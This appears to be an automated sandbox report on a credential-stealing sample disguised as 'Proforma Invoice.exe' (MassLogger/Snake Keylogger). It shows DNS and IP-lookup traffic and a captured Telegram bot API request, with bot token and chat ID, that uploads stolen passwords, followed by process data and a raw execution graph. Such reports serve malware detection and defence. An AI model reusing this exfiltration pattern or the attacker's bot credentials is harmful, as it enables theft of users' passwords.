                                                                                              Dec 23, 2024 21:50:21.909363985 CET49732443192.168.2.4149.154.167.220
                                                                                              Dec 23, 2024 21:50:21.909375906 CET44349732149.154.167.220192.168.2.4
                                                                                              Dec 23, 2024 21:50:21.909753084 CET44349732149.154.167.220192.168.2.4
                                                                                              Dec 23, 2024 21:50:21.915019989 CET49732443192.168.2.4149.154.167.220
                                                                                              Dec 23, 2024 21:50:21.959337950 CET44349732149.154.167.220192.168.2.4
                                                                                              Dec 23, 2024 21:50:21.959510088 CET49732443192.168.2.4149.154.167.220
                                                                                              Dec 23, 2024 21:50:21.959518909 CET44349732149.154.167.220192.168.2.4
                                                                                              Dec 23, 2024 21:50:22.759144068 CET44349732149.154.167.220192.168.2.4
                                                                                              Dec 23, 2024 21:50:22.760751009 CET44349732149.154.167.220192.168.2.4
                                                                                              Dec 23, 2024 21:50:22.760848045 CET49732443192.168.2.4149.154.167.220
                                                                                              Dec 23, 2024 21:50:22.761169910 CET49732443192.168.2.4149.154.167.220
                                                                                              Dec 23, 2024 21:51:25.325413942 CET8049730193.122.6.168192.168.2.4
                                                                                              Dec 23, 2024 21:51:25.327538967 CET4973080192.168.2.4193.122.6.168
                                                                                              Dec 23, 2024 21:51:54.824346066 CET4973080192.168.2.4193.122.6.168
                                                                                              Dec 23, 2024 21:51:54.945280075 CET8049730193.122.6.168192.168.2.4
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 23, 2024 21:50:06.574455023 CET5212453192.168.2.41.1.1.1
                                                                                              Dec 23, 2024 21:50:06.713393927 CET53521241.1.1.1192.168.2.4
                                                                                              Dec 23, 2024 21:50:12.974881887 CET5611653192.168.2.41.1.1.1
                                                                                              Dec 23, 2024 21:50:13.116233110 CET53561161.1.1.1192.168.2.4
                                                                                              Dec 23, 2024 21:50:20.344038010 CET6264653192.168.2.41.1.1.1
                                                                                              Dec 23, 2024 21:50:20.490004063 CET53626461.1.1.1192.168.2.4
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Dec 23, 2024 21:50:06.574455023 CET192.168.2.41.1.1.10x2df3Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                              Dec 23, 2024 21:50:12.974881887 CET192.168.2.41.1.1.10x89aStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                              Dec 23, 2024 21:50:20.344038010 CET192.168.2.41.1.1.10x20ddStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Dec 23, 2024 21:50:06.713393927 CET1.1.1.1192.168.2.40x2df3No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 23, 2024 21:50:06.713393927 CET1.1.1.1192.168.2.40x2df3No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                              Dec 23, 2024 21:50:06.713393927 CET1.1.1.1192.168.2.40x2df3No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                              Dec 23, 2024 21:50:06.713393927 CET1.1.1.1192.168.2.40x2df3No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                              Dec 23, 2024 21:50:06.713393927 CET1.1.1.1192.168.2.40x2df3No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                              Dec 23, 2024 21:50:06.713393927 CET1.1.1.1192.168.2.40x2df3No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                              Dec 23, 2024 21:50:13.116233110 CET1.1.1.1192.168.2.40x89aNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                              Dec 23, 2024 21:50:13.116233110 CET1.1.1.1192.168.2.40x89aNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                              Dec 23, 2024 21:50:20.490004063 CET1.1.1.1192.168.2.40x20ddNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                              • reallyfreegeoip.org
                                                                                              • api.telegram.org
                                                                                              • checkip.dyndns.org
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.449730193.122.6.168807324C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 23, 2024 21:50:06.872189999 CET151OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Connection: Keep-Alive
                                                                                              Dec 23, 2024 21:50:12.194752932 CET273INHTTP/1.1 200 OK
                                                                                              Date: Mon, 23 Dec 2024 20:50:11 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 104
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                              Dec 23, 2024 21:50:12.200730085 CET127OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Dec 23, 2024 21:50:12.929435968 CET273INHTTP/1.1 200 OK
                                                                                              Date: Mon, 23 Dec 2024 20:50:12 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 104
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                              Dec 23, 2024 21:50:19.916575909 CET127OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Dec 23, 2024 21:50:20.324302912 CET273INHTTP/1.1 200 OK
                                                                                              Date: Mon, 23 Dec 2024 20:50:20 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 104
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.449731104.21.67.1524437324C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-23 20:50:14 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                              Host: reallyfreegeoip.org
                                                                                              Connection: Keep-Alive
                                                                                              2024-12-23 20:50:14 UTC858INHTTP/1.1 200 OK
                                                                                              Date: Mon, 23 Dec 2024 20:50:14 GMT
                                                                                              Content-Type: text/xml
                                                                                              Content-Length: 362
                                                                                              Connection: close
                                                                                              Age: 301803
                                                                                              Cache-Control: max-age=31536000
                                                                                              cf-cache-status: HIT
                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7XcMpymYcc783bZZ4ipxDUDYauXDYwon%2BUbVsceIVT%2B1Jl4aXkGDrW4cja6ng9CNfBeKmMR5xwJDNwCD%2BN7f5uoXT0NOdhaoOUh4Wq4o87Mzv3AUsmGt%2BuF8l%2BzAMvcjdShqA7AX"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f6b39096fea8cd4-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1939&min_rtt=1938&rtt_var=730&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1496668&cwnd=164&unsent_bytes=0&cid=f8b238f3f1e27d1c&ts=464&x=0"
                                                                                              2024-12-23 20:50:14 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.449732149.154.167.2204437324C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-23 20:50:21 UTC295OUTPOST /bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary================8dd236981062ef2
                                                                                              Host: api.telegram.org
                                                                                              Content-Length: 1090
                                                                                              Connection: Keep-Alive
                                                                                              2024-12-23 20:50:21 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 33 36 39 38 31 30 36 32 65 66 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                              Data Ascii: --===============8dd236981062ef2Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                              2024-12-23 20:50:22 UTC388INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0
                                                                                              Date: Mon, 23 Dec 2024 20:50:22 GMT
                                                                                              Content-Type: application/json
                                                                                              Content-Length: 556
                                                                                              Connection: close
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                              2024-12-23 20:50:22 UTC556INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 35 32 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 30 38 36 36 32 37 37 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 4f 56 41 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6b 75 6c 6c 73 6e 6f 76 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 38 33 39 38 32 39 34 37 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 6b 77 61 6e 64 61 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 53 6b 75 6c 6c 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 42 69 67 34 6d 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 39 38 37 30 32 32 2c 22 64 6f 63 75
                                                                                              Data Ascii: {"ok":true,"result":{"message_id":25240,"from":{"id":7708662779,"is_bot":true,"first_name":"NOVA","username":"Skullsnovabot"},"chat":{"id":5839829477,"first_name":"Makwanda","last_name":"Skulls","username":"Big4m","type":"private"},"date":1734987022,"docu


                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:15:50:04
                                                                                              Start date:23/12/2024
                                                                                              Path:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\Proforma Invoice.exe"
                                                                                              Imagebase:0x6a0000
                                                                                              File size:955'392 bytes
                                                                                              MD5 hash:58D259F56B4715BCEA1DDEBBC2735EB2
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1769500519.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1769500519.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1769500519.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1769500519.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.1769500519.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:1
                                                                                              Start time:15:50:05
                                                                                              Start date:23/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\Proforma Invoice.exe"
                                                                                              Imagebase:0xcf0000
                                                                                              File size:45'984 bytes
                                                                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000001.00000002.4215515073.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4215515073.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4215515073.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4215515073.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000001.00000002.4216346327.00000000031BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4216346327.00000000031BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4216346327.00000000031BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:3.9%
                                                                                                Dynamic/Decrypted Code Coverage:0.4%
                                                                                                Signature Coverage:4.7%
                                                                                                Total number of Nodes:2000
                                                                                                Total number of Limit Nodes:42
                                                                                                execution_graph 100409 6a552a 100416 6a5ab8 100409->100416 100415 6a555a Mailbox 100428 6c0db6 100416->100428 100418 6a5acb 100419 6c0db6 Mailbox 59 API calls 100418->100419 100420 6a553c 100419->100420 100421 6a54d2 100420->100421 100466 6a58cf 100421->100466 100424 6a5514 100424->100415 100427 6a8061 61 API calls Mailbox 100424->100427 100425 6a54e3 100425->100424 100473 6a5bc0 100425->100473 100479 6a5a7a 100425->100479 100427->100415 100432 6c0dbe 100428->100432 100430 6c0dd8 100430->100418 100432->100430 100433 6c0ddc std::exception::exception 100432->100433 100438 6c571c 100432->100438 100455 6c33a1 DecodePointer 100432->100455 100456 6c859b RaiseException 100433->100456 100435 6c0e06 100457 6c84d1 58 API calls _free 100435->100457 100437 6c0e18 100437->100418 100439 6c5797 100438->100439 100452 6c5728 100438->100452 100464 6c33a1 DecodePointer 100439->100464 100441 6c579d 100465 6c8b28 58 API calls __getptd_noexit 100441->100465 100442 6c5733 100442->100452 100458 6ca16b 58 API calls 2 library calls 100442->100458 100459 6ca1c8 58 API calls 7 library calls 100442->100459 100460 6c309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100442->100460 100445 6c575b RtlAllocateHeap 100446 6c578f 100445->100446 100445->100452 100446->100432 100448 6c5783 100462 6c8b28 58 API calls __getptd_noexit 100448->100462 100452->100442 100452->100445 100452->100448 100453 6c5781 100452->100453 100461 6c33a1 DecodePointer 100452->100461 100463 6c8b28 58 API calls __getptd_noexit 100453->100463 100455->100432 100456->100435 100457->100437 100458->100442 100459->100442 100461->100452 100462->100453 100463->100446 100464->100441 100465->100446 100467 6ddc3c 100466->100467 100468 6a58e0 100466->100468 100488 6f5ecd 59 API calls Mailbox 100467->100488 100468->100425 100470 6ddc46 100471 6c0db6 Mailbox 59 API calls 100470->100471 100472 6ddc52 100471->100472 100474 6a5c33 100473->100474 100477 6a5bce 100473->100477 100489 6a5c4e SetFilePointerEx 100474->100489 100476 6a5bf6 100476->100425 100477->100476 100478 6a5c06 ReadFile 100477->100478 100478->100476 100478->100477 100480 6ddcee 100479->100480 100481 6a5a8e 100479->100481 100495 6f5ecd 59 API calls Mailbox 100480->100495 100490 6a59b9 100481->100490 100484 6ddcf9 100486 6c0db6 Mailbox 59 API calls 100484->100486 100485 6a5a9a 100485->100425 100487 6ddd0e _memmove 100486->100487 100488->100470 100489->100477 100491 6a59d1 100490->100491 100493 6a59ca _memmove 100490->100493 100492 6c0db6 Mailbox 59 API calls 100491->100492 100494 6ddc7e 100491->100494 100492->100493 100493->100485 100494->100494 100495->100484 100496 6dfdfc 100497 6aab30 Mailbox _memmove 100496->100497 100501 6c0db6 59 API calls Mailbox 100497->100501 100522 6a9f37 Mailbox 100497->100522 100524 6aa057 100497->100524 100529 6ab2b6 100497->100529 100532 6e086a 100497->100532 100534 6e0878 100497->100534 100536 6e085c 100497->100536 100537 6ab21c 100497->100537 100540 6f6e8f 59 API calls 100497->100540 100542 6ab525 100497->100542 100548 6a9ea0 100497->100548 100572 70d07a 100497->100572 100619 71445a 100497->100619 100628 6b1fc3 100497->100628 100668 70d07b 100497->100668 100715 71df23 100497->100715 100718 71c2e0 100497->100718 100750 707956 100497->100750 100756 6a7de1 100497->100756 100760 71bc6b 100497->100760 100800 6f617e 100497->100800 100805 6a9c90 59 API calls Mailbox 100497->100805 100809 71c193 85 API calls 2 library calls 100497->100809 100499 6f617e Mailbox 59 API calls 100499->100524 100501->100497 100504 6c0db6 59 API calls Mailbox 100504->100522 100505 6e0055 100810 709e4a 89 API calls 4 library calls 100505->100810 100508 6ab475 100811 6a8047 100508->100811 100510 6e0064 100513 6ab47a 100513->100505 100525 6e09e5 100513->100525 100515 6a7667 59 API calls 100515->100522 100516 6a8047 59 API calls 100516->100522 100518 6f6e8f 59 API calls 100518->100522 100519 6c2d40 67 API calls __cinit 100519->100522 100521 6e09d6 100819 709e4a 89 API calls 4 library calls 100521->100819 100522->100504 100522->100505 100522->100508 100522->100513 100522->100515 100522->100516 100522->100518 100522->100519 100522->100521 100522->100524 100526 6aa55a 100522->100526 100803 6ac8c0 341 API calls 2 library calls 100522->100803 100804 6ab900 60 API calls Mailbox 100522->100804 100820 709e4a 89 API calls 4 library calls 100525->100820 100818 709e4a 89 API calls 4 library calls 100526->100818 100808 6af6a3 341 API calls 100529->100808 100816 6a9c90 59 API calls Mailbox 100532->100816 100817 709e4a 89 API calls 4 library calls 100534->100817 100536->100499 100536->100524 100806 6a9d3c 60 API calls Mailbox 100537->100806 100539 6ab22d 100807 6a9d3c 60 API calls Mailbox 100539->100807 100540->100497 100815 709e4a 89 API calls 4 library calls 100542->100815 100549 6a9ebf 100548->100549 100565 6a9eed Mailbox 100548->100565 100550 6c0db6 Mailbox 59 API calls 100549->100550 100550->100565 100551 6ab475 100552 6a8047 59 API calls 100551->100552 100567 6aa057 100552->100567 100553 6ab47a 100555 6e0055 100553->100555 100570 6e09e5 100553->100570 100554 6c0db6 59 API calls Mailbox 100554->100565 100823 709e4a 89 API calls 4 library calls 100555->100823 100559 6c2d40 67 API calls __cinit 100559->100565 100560 6e0064 100560->100497 100563 6a8047 59 API calls 100563->100565 100564 6a7667 59 API calls 100564->100565 100565->100551 100565->100553 100565->100554 100565->100555 100565->100559 100565->100563 100565->100564 100566 6f6e8f 59 API calls 100565->100566 100565->100567 100568 6e09d6 100565->100568 100571 6aa55a 100565->100571 100821 6ac8c0 341 API calls 2 library calls 100565->100821 100822 6ab900 60 API calls Mailbox 100565->100822 100566->100565 100567->100497 100825 709e4a 89 API calls 4 library calls 100568->100825 100826 709e4a 89 API calls 4 library calls 100570->100826 100824 709e4a 89 API calls 4 library calls 100571->100824 100573 70d09a 100572->100573 100574 70d0a5 100572->100574 100858 6a9b3c 100573->100858 100617 70d17f Mailbox 100574->100617 100862 6a7667 100574->100862 100576 6c0db6 Mailbox 59 API calls 100578 70d1c8 100576->100578 100580 70d1d4 100578->100580 100931 6a57a6 60 API calls Mailbox 100578->100931 100827 6a9837 100580->100827 100581 6a7667 59 API calls 100584 70d0d2 100581->100584 100586 6a9837 84 API calls 100584->100586 100588 70d0de 100586->100588 100867 6a459b 100588->100867 100591 70d0f3 100918 6a7b2e 100591->100918 100592 70d233 100596 70d295 100592->100596 100597 70d25e 100592->100597 100593 70d1ff GetLastError 100595 70d218 100593->100595 100615 70d188 Mailbox 100595->100615 100932 6a58ba CloseHandle 100595->100932 100601 6c0db6 Mailbox 59 API calls 100596->100601 100599 6c0db6 Mailbox 59 API calls 100597->100599 100603 70d263 100599->100603 100600 70d178 100602 6a9b3c 59 API calls 100600->100602 100606 70d29a 100601->100606 100602->100617 100607 70d274 100603->100607 100610 6a7667 59 API calls 100603->100610 100609 6a7667 59 API calls 100606->100609 100606->100615 100933 71fbce 59 API calls 2 library calls 100607->100933 100609->100615 100610->100607 100611 70d13a 100612 6a7de1 59 API calls 100611->100612 100614 70d147 100612->100614 100930 703a2a 63 API calls Mailbox 100614->100930 100615->100497 100617->100576 100617->100615 100618 70d150 Mailbox 100618->100600 100620 6a9837 84 API calls 100619->100620 100621 714494 100620->100621 101040 6a6240 100621->101040 100623 7144a4 100624 7144c9 100623->100624 100625 6a9ea0 341 API calls 100623->100625 100627 7144cd 100624->100627 101065 6a9a98 100624->101065 100625->100624 100627->100497 100629 6a9a98 59 API calls 100628->100629 100630 6b1fdb 100629->100630 100632 6c0db6 Mailbox 59 API calls 100630->100632 100635 6e6585 100630->100635 100633 6b1ff4 100632->100633 100636 6b2004 100633->100636 101106 6a57a6 60 API calls Mailbox 100633->101106 100634 6b2029 100640 6a9b3c 59 API calls 100634->100640 100645 6b2036 100634->100645 100635->100634 101110 70f574 59 API calls 100635->101110 100638 6a9837 84 API calls 100636->100638 100639 6b2012 100638->100639 100641 6a57f6 67 API calls 100639->100641 100642 6e65cd 100640->100642 100643 6b2021 100641->100643 100644 6e65d5 100642->100644 100642->100645 100643->100634 100643->100635 101109 6a58ba CloseHandle 100643->101109 100647 6a9b3c 59 API calls 100644->100647 100646 6a5cdf 2 API calls 100645->100646 100649 6b203d 100646->100649 100647->100649 100650 6e65e7 100649->100650 100651 6b2057 100649->100651 100652 6c0db6 Mailbox 59 API calls 100650->100652 100653 6a7667 59 API calls 100651->100653 100654 6e65ed 100652->100654 100655 6b205f 100653->100655 100656 6e6601 100654->100656 101111 6a5850 ReadFile SetFilePointerEx 100654->101111 101091 6a5572 100655->101091 100662 6e6605 _memmove 100656->100662 101112 7076c4 59 API calls 2 library calls 100656->101112 100660 6b206e 100660->100662 101107 6a9a3c 59 API calls Mailbox 100660->101107 100663 6b2082 Mailbox 100664 6b20bc 100663->100664 100665 6a5c6f CloseHandle 100663->100665 100664->100497 100666 6b20b0 100665->100666 100666->100664 101108 6a58ba CloseHandle 100666->101108 100669 70d09a 100668->100669 100670 70d0a5 100668->100670 100671 6a9b3c 59 API calls 100669->100671 100673 6a7667 59 API calls 100670->100673 100704 70d17f Mailbox 100670->100704 100671->100670 100672 6c0db6 Mailbox 59 API calls 100674 70d1c8 100672->100674 100675 70d0c9 100673->100675 100676 70d1d4 100674->100676 101117 6a57a6 60 API calls Mailbox 100674->101117 100677 6a7667 59 API calls 100675->100677 100679 6a9837 84 API calls 100676->100679 100680 70d0d2 100677->100680 100681 70d1ec 100679->100681 100682 6a9837 84 API calls 100680->100682 100683 6a57f6 67 API calls 100681->100683 100684 70d0de 100682->100684 100686 70d1fb 100683->100686 100685 6a459b 59 API calls 100684->100685 100687 70d0f3 100685->100687 100688 70d233 100686->100688 100689 70d1ff GetLastError 100686->100689 100690 6a7b2e 59 API calls 100687->100690 100692 70d295 100688->100692 100693 70d25e 100688->100693 100691 70d218 100689->100691 100694 70d126 100690->100694 100697 70d188 Mailbox 100691->100697 101118 6a58ba CloseHandle 100691->101118 100698 6c0db6 Mailbox 59 API calls 100692->100698 100695 6c0db6 Mailbox 59 API calls 100693->100695 100696 70d178 100694->100696 100701 703c37 3 API calls 100694->100701 100700 70d263 100695->100700 100699 6a9b3c 59 API calls 100696->100699 100697->100497 100703 70d29a 100698->100703 100699->100704 100705 70d274 100700->100705 100708 6a7667 59 API calls 100700->100708 100706 70d136 100701->100706 100703->100697 100707 6a7667 59 API calls 100703->100707 100704->100672 100704->100697 101119 71fbce 59 API calls 2 library calls 